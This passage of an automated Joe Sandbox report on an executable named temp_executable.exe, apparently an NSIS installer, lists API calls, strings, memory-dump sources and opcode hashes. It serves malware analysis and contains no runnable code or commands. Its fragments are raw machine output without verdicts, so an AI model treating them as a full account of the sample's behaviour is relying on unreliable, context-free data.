                                • lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp,00403433,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\temp_executable.exe,C:\Users\user\AppData\Local\Temp\temp_executable.exe,80000000,00000003,?,?,?,?,?), ref: 00406CF1
                                • CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D02
                                Strings
                                • C:\Users\user\AppData\Local\Temp, xrefs: 00406CEB
                                Memory Dump Source
                                • Source File: 00000002.00000002.19987755740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000002.00000002.19987716818.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987800064.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000414000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000427000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.000000000042C000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000434000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000450000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19987834712.0000000000453000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000002.00000002.19988114070.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: CharPrevlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp
                                • API String ID: 2709904686-670666241
                                • Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                • Instruction ID: 4dbe35682b60e6d52269d03a3853e7a49c7dcb535e87d19da2916c46be0a3be3
                                • Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                • Instruction Fuzzy Hash: EBD05E31015924DBD7526B18ED099AF7BB8EF0130030A846EE987E3160CB385C9187AD

                                Execution Graph

                                Execution Coverage:0%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:100%
                                Total number of Nodes:1
                                Total number of Limit Nodes:0
                                execution_graph 62058 32d82b90 LdrInitializeThunk

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 4 32d834e0-32d834ec LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 3edb027c598ff89e30bb81f3956250c5bdfbd891316874dc5cf99d7b250b0a74
                                • Instruction ID: e3ee6d1431476e0ad609ea3637d0a49251a880878775034f7972b194395ff01d
                                • Opcode Fuzzy Hash: 3edb027c598ff89e30bb81f3956250c5bdfbd891316874dc5cf99d7b250b0a74
                                • Instruction Fuzzy Hash: 2090023165510402D60062986714746100547D1601F61C856B041C538DC7A5895576B2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1 32d82bc0-32d82bcc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 35fad57f82ba1dfeaddcecc9d98c017f70a6175b117c785bf91e2304a85bf981
                                • Instruction ID: e5df1c89bba143c39521de81ce5a79d8e8f1634bc27d166865236aa3a7ba606b
                                • Opcode Fuzzy Hash: 35fad57f82ba1dfeaddcecc9d98c017f70a6175b117c785bf91e2304a85bf981
                                • Instruction Fuzzy Hash: BF90023125100402D60066D87608686000547E1701F51D456B501C535EC67588957231

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 32d82b90-32d82b9c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 74c777f7ce30ddd0e27c599303f2a2d2311639142371b892bcb503aa2304e713
                                • Instruction ID: a97606fd0543705c37ec4b9fcbea4032667a1240666145c3dbe3967e5f4777e3
                                • Opcode Fuzzy Hash: 74c777f7ce30ddd0e27c599303f2a2d2311639142371b892bcb503aa2304e713
                                • Instruction Fuzzy Hash: 0F90023125108802D6106298A60478A000547D1701F55C856B441C638DC6A588957231

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3 32d82eb0-32d82ebc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: ee5981a93259e25bd13e34df869ef839147d909f3a0f23d52c8b1259d3895e83
                                • Instruction ID: 7678cc4db593878d583fa31c07b22c2938b06430021921013d32d1fe6918afde
                                • Opcode Fuzzy Hash: ee5981a93259e25bd13e34df869ef839147d909f3a0f23d52c8b1259d3895e83
                                • Instruction Fuzzy Hash: C190023125140402D60062986A1474B000547D1702F51C456B115C535DC63588557671

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2 32d82d10-32d82d1c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                 • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: a7a41abc40a6171ce38b93fca88d12e3817b2eac8fddbf77aca577a547947372
                                • Instruction ID: 98d0a11418f97e7f761e52adef7b49168cd9a5b826093d43bcdb3a3410ce706e
                                • Opcode Fuzzy Hash: a7a41abc40a6171ce38b93fca88d12e3817b2eac8fddbf77aca577a547947372
                                • Instruction Fuzzy Hash: 5E90023125100413D61162986704747000947D1641F91C857B041C538DD6668956B231

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                 control_flow_graph 5 4036d7-403720 SetErrorMode GetVersionExW (entry block; the remaining basic-block nodes and edges of this graph were rendered as a figure and are not reproduced here; the APIs it calls are listed under APIs below)
                                APIs
                                • SetErrorMode.KERNEL32(00008001), ref: 004036F3
                                • GetVersionExW.KERNEL32 ref: 0040371C
                                • GetVersionExW.KERNEL32(?), ref: 0040372F
                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037D7
                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403811
                                • OleInitialize.OLE32(00000000), ref: 00403818
                                • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 00403837
                                • GetCommandLineW.KERNEL32(00428D00,NSIS Error), ref: 0040384C
                                • CharNextW.USER32(00000000,00434000,?,00434000,00000000), ref: 00403898
                                • GetTempPathW.KERNEL32(00000400,00436800), ref: 00403996
                                • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 004039A7
                                • lstrcatW.KERNEL32(00436800,\Temp), ref: 004039B3
                                • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 004039C7
                                • lstrcatW.KERNEL32(00436800,Low), ref: 004039CF
                                • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 004039E0
                                • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 004039E8
                                • DeleteFileW.KERNEL32(00436000), ref: 00403A02
                                  • Part of subcall function 004033C8: GetTickCount.KERNEL32 ref: 004033DB
                                  • Part of subcall function 004033C8: GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,?,?,?), ref: 004033F7
                                • lstrcatW.KERNEL32(00436800,~nsu,00434000,00000000,00000000), ref: 00403AA5
                                • lstrcatW.KERNEL32(00436800,00408600,00436800,~nsu,00434000,00000000,00000000), ref: 00403AB8
                                • lstrcatW.KERNEL32(00436800,.tmp,00436800,~nsu,00434000,00000000,00000000), ref: 00403AC7
                                • lstrcmpiW.KERNEL32(00436800,00435800,00436800,.tmp,00436800,~nsu,00434000,00000000,00000000), ref: 00403AD6
                                • SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403AFE
                                • DeleteFileW.KERNEL32(004209C0,004209C0,?,0042A000,?), ref: 00403B51
                                • CopyFileW.KERNEL32(00437800,004209C0,00000001), ref: 00403B63
                                • CloseHandle.KERNEL32(00000000,004209C0,004209C0,?,004209C0,00000000), ref: 00403B9C
                                  • Part of subcall function 00405DF9: CreateDirectoryW.KERNEL32(?,00000000,00436800,00403CA4,00436800,00436800,00436800,00436800,76073420,0040399D), ref: 00405E01
                                  • Part of subcall function 00405DF9: GetLastError.KERNEL32 ref: 00405E0B
                                • OleUninitialize.OLE32(00000000), ref: 00403BCA
                                • ExitProcess.KERNEL32 ref: 00403BE1
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BF7
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403BFE
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C13
                                • AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C36
                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5B
                                  • Part of subcall function 004065D1: CharNextW.USER32(?,00403897,00434000,?,00434000,00000000), ref: 004065E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                • String ID: .tmp$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                • API String ID: 1152188737-334447862
                                • Opcode ID: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                • Instruction ID: 07a9971b8f29bbd68b878d9119023e68a6b74827d1d77f0d98df9434206269f1
                                • Opcode Fuzzy Hash: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                • Instruction Fuzzy Hash: 4FD137712043116AD7207F619D46B6B3AACAB4574AF51443FF582B62D2DBBC8E408B2E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $ $0
                                • API String ID: 3446177414-3352262554
                                • Opcode ID: c3f1a9b4ec0145d7d62b64dd9d8a562df837999586a2543fb62478fd59e850e2
                                • Instruction ID: 479d4f4a5d93cca81dcf756d84b247687f4dda00c4a85924a443954e19eab5e0
                                • Opcode Fuzzy Hash: c3f1a9b4ec0145d7d62b64dd9d8a562df837999586a2543fb62478fd59e850e2
                                • Instruction Fuzzy Hash: BE32E4B56093818FE350CF68C484B9ABBE5BF88348F40492EF9DA87350DB75D949CB52
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                • API String ID: 3446177414-1700792311
                                • Opcode ID: fb89dca89f95c9655674f290286d8ae13d5cf77873c3ebdc74a09b985e104863
                                • Instruction ID: 1d8b77a2ba6d03b74202cac146cc0f13f5b6a3e54bc60f5d7548acdeb6c2becc
                                • Opcode Fuzzy Hash: fb89dca89f95c9655674f290286d8ae13d5cf77873c3ebdc74a09b985e104863
                                • Instruction Fuzzy Hash: 44D12136501685EFDB06CFA4E400AADBBF1FF09305F46C489E585AB751CB36E985CB24
                                APIs
                                  • Part of subcall function 00406613: lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406667
                                  • Part of subcall function 00406613: GetFileAttributesW.KERNEL32(00425A48,00425A48), ref: 00406678
                                • DeleteFileW.KERNEL32(?,?,00000000,76073420,?), ref: 00406720
                                • lstrcatW.KERNEL32(00425248,\*.*,00425248,?,00000000,?,00000000,76073420,?), ref: 00406772
                                • lstrcatW.KERNEL32(?,004082B0,?,00425248,?,00000000,?,00000000,76073420,?), ref: 00406793
                                • lstrlenW.KERNEL32(?), ref: 00406796
                                • FindFirstFileW.KERNEL32(00425248,?), ref: 004067AD
                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 0040683E
                                • FindClose.KERNEL32(00000000), ref: 00406850
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                • String ID: \*.*
                                • API String ID: 2636146433-1173974218
                                • Opcode ID: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction ID: ed3bb2814488eceec14de134e67e78f5f853c3bf88eed2e9a0dc8686b927a400
                                • Opcode Fuzzy Hash: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                • Instruction Fuzzy Hash: E841193210671069D7207B399D45A6B76E8DF81318F12453FF883B21D1EB7C8C6686AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                • API String ID: 0-2515994595
                                • Opcode ID: 31cb590bdc666523f624b6424c69803e8fc005486d6a8d057910701aa0093944
                                • Instruction ID: 2661c0fe1b318f17cd540642279ddbf14bdf24749d66b6b2673132fd18c90e74
                                • Opcode Fuzzy Hash: 31cb590bdc666523f624b6424c69803e8fc005486d6a8d057910701aa0093944
                                • Instruction Fuzzy Hash: DF515CB55043559BE325CF18B980B9BBBE8EB84354F50491DBEAAC3360EB70D644CBD2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                • API String ID: 3446177414-1745908468
                                • Opcode ID: f438a25e95da8d7abdbaed0418567346d2f863160eb408fc6a7a83fa05c367c0
                                • Instruction ID: 01bad9e75052d64abf487140aaa45f1599161d53624881d67a9f9bddeff6ef56
                                • Opcode Fuzzy Hash: f438a25e95da8d7abdbaed0418567346d2f863160eb408fc6a7a83fa05c367c0
                                • Instruction Fuzzy Hash: A7913236901748DFEB02CFA8D440A9DBBF2FF49394F448449E486AF351CB7A9981CB60
                                APIs
                                • RtlDebugPrintTimes.NTDLL ref: 32D3651C
                                  • Part of subcall function 32D36565: RtlDebugPrintTimes.NTDLL ref: 32D36614
                                  • Part of subcall function 32D36565: RtlDebugPrintTimes.NTDLL ref: 32D3665F
                                Strings
                                • apphelp.dll, xrefs: 32D36446
                                • LdrpInitShimEngine, xrefs: 32D99783, 32D99796, 32D997BF
                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 32D9977C
                                • minkernel\ntdll\ldrinit.c, xrefs: 32D997A0, 32D997C9
                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32D99790
                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 32D997B9
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-204845295
                                • Opcode ID: f870e6517864594a43ed09042726a61ee8a81f0e8a915390a2e55da42cb0a77a
                                • Instruction ID: b44b9cae351fab2e89a8bcf14e2e0a91396fe8ccb2cc044fc1d482ebfc42e916
                                • Opcode Fuzzy Hash: f870e6517864594a43ed09042726a61ee8a81f0e8a915390a2e55da42cb0a77a
                                • Instruction Fuzzy Hash: 0E519C716493049FE315CF20D991EDB77E8EB84748F800929F69597360EA70D944CBA6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                • API String ID: 0-3532704233
                                • Opcode ID: 90a9d526150727dcbb891bd3f467fdc0a3e6dba2a98e839c0ab3ea852306a811
                                • Instruction ID: afe064e5c610e604e19545ad6123d728e7bbde2f56f672567979862b3232aa3f
                                • Opcode Fuzzy Hash: 90a9d526150727dcbb891bd3f467fdc0a3e6dba2a98e839c0ab3ea852306a811
                                • Instruction Fuzzy Hash: F1B17AB69093859FD716CF24C480B5FB7E8AB88758F41492EFA8497314DB70D908CFA2
                                APIs
                                • RtlDebugPrintTimes.NTDLL ref: 32D6D879
                                  • Part of subcall function 32D44779: RtlDebugPrintTimes.NTDLL ref: 32D44817
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-1975516107
                                • Opcode ID: 1dd6706b2d5e875ed6d02a857b940f0803998f08c1bc6052645085db54afdcc9
                                • Instruction ID: 04e37ebb20086ca366ea721e571b27ce0b8449a75225fb671915a1c82a6f5c60
                                • Opcode Fuzzy Hash: 1dd6706b2d5e875ed6d02a857b940f0803998f08c1bc6052645085db54afdcc9
                                • Instruction Fuzzy Hash: 80510175A403498FEB04CFA4D4857AEBBB1BF48308FA44459D9017B385DBB0A9C6CBE0
                                Strings
                                • @, xrefs: 32D3D2B3
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 32D3D263
                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 32D3D136
                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 32D3D06F
                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 32D3D0E6
                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 32D3D202
                                • @, xrefs: 32D3D09D
                                • @, xrefs: 32D3D24F
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                • API String ID: 0-1356375266
                                • Opcode ID: 467ab94b96184bd488c33287e5ef0e469781beb5e9c2793634b8b3f9bba0b422
                                • Instruction ID: 908fe69349fc398e80f5008f2c006a45e9453151f9b0c925ab685df713991850
                                • Opcode Fuzzy Hash: 467ab94b96184bd488c33287e5ef0e469781beb5e9c2793634b8b3f9bba0b422
                                • Instruction Fuzzy Hash: 41A14FB25093459FE361CF21D484B9BB7E8BF88755F11492EFA8896340DB74D908CFA2
                                Strings
                                • VerifierFlags, xrefs: 32DC88D0
                                • AVRF: -*- final list of providers -*- , xrefs: 32DC880F
                                • HandleTraces, xrefs: 32DC890F
                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 32DC86BD
                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 32DC86E7
                                • VerifierDlls, xrefs: 32DC893D
                                • VerifierDebug, xrefs: 32DC8925
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                • API String ID: 0-3223716464
                                • Opcode ID: e3cd27522b3142753508dc80267ec9cfdc7cf4834aabc7f335e58c6d575adff6
                                • Instruction ID: 403b872def4640dbbea4ffbe7d40fc558068b0be3b9728a209660356ec9dc8f6
                                • Opcode Fuzzy Hash: e3cd27522b3142753508dc80267ec9cfdc7cf4834aabc7f335e58c6d575adff6
                                • Instruction Fuzzy Hash: 55914571946765EFE313CF64A881F6A77A8BF44708F810968FA84AB350DB70DC45CBA1
                                Strings
                                • apphelp.dll, xrefs: 32D62382
                                • LdrpDynamicShimModule, xrefs: 32DAA7A5
                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 32DAA79F
                                • minkernel\ntdll\ldrinit.c, xrefs: 32DAA7AF
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-176724104
                                • Opcode ID: e5bc0acc30d9d9963d9a5c64a9e6dbb44b54414055ae827722c9ae544737dd3c
                                • Instruction ID: 84d351afae89f8bc5bd2a1517733b902f28b41299a26bee202bf2208b4d7d509
                                • Opcode Fuzzy Hash: e5bc0acc30d9d9963d9a5c64a9e6dbb44b54414055ae827722c9ae544737dd3c
                                • Instruction Fuzzy Hash: BD312676A41385EFE7049F28C896E5A77B4FB84705F98095DEA007B350DBB098C2CBD0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
